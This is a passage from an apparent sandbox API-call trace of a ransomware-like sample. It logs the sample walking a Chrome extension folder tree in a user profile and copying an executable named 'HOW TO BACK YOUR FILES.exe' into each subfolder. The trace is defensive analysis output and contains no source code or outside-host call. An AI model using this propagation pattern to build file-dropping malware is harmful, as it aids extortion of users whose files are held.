Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.886] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.887] GetLastError () returned 0x0 [0104.887] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.887] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.887] CloseHandle (hObject=0x120) returned 1 [0104.887] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.887] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x814d6d00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e279fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e279fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.887] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.887] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.887] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0" [0104.887] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0" [0104.887] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.887] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.888] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.892] GetLastError () returned 0x0 [0104.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.892] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.892] CloseHandle (hObject=0x120) returned 1 [0104.893] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.893] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86989eb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d92e5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d92e5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.893] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.893] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.893] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata" [0104.893] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata" [0104.893] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.894] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.894] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.894] GetLastError () returned 0x0 [0104.895] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.895] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.895] CloseHandle (hObject=0x120) returned 1 [0104.895] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86aba9b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d92e5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d92e5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.895] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.895] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.895] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales" [0104.895] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales" [0104.895] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.895] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.896] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.896] GetLastError () returned 0x0 [0104.896] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.896] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.896] CloseHandle (hObject=0x120) returned 1 [0104.897] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.897] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2a0100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2a0100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.897] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.897] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.897] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW" [0104.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW" [0104.897] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.897] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.898] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.898] GetLastError () returned 0x0 [0104.898] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.898] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.898] CloseHandle (hObject=0x120) returned 1 [0104.898] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.899] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d954720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d954720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.899] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.899] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.899] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN" [0104.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN" [0104.899] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.899] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.900] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.900] GetLastError () returned 0x0 [0104.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.900] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.900] CloseHandle (hObject=0x120) returned 1 [0104.900] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.900] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d97a880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d97a880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.900] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.900] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.901] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi" [0104.901] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi" [0104.901] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.901] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.901] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.902] GetLastError () returned 0x0 [0104.902] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.902] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.902] CloseHandle (hObject=0x120) returned 1 [0104.902] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9a09e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9a09e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.902] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.902] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.902] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk" [0104.903] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk" [0104.903] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.903] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\HOW TO BACK 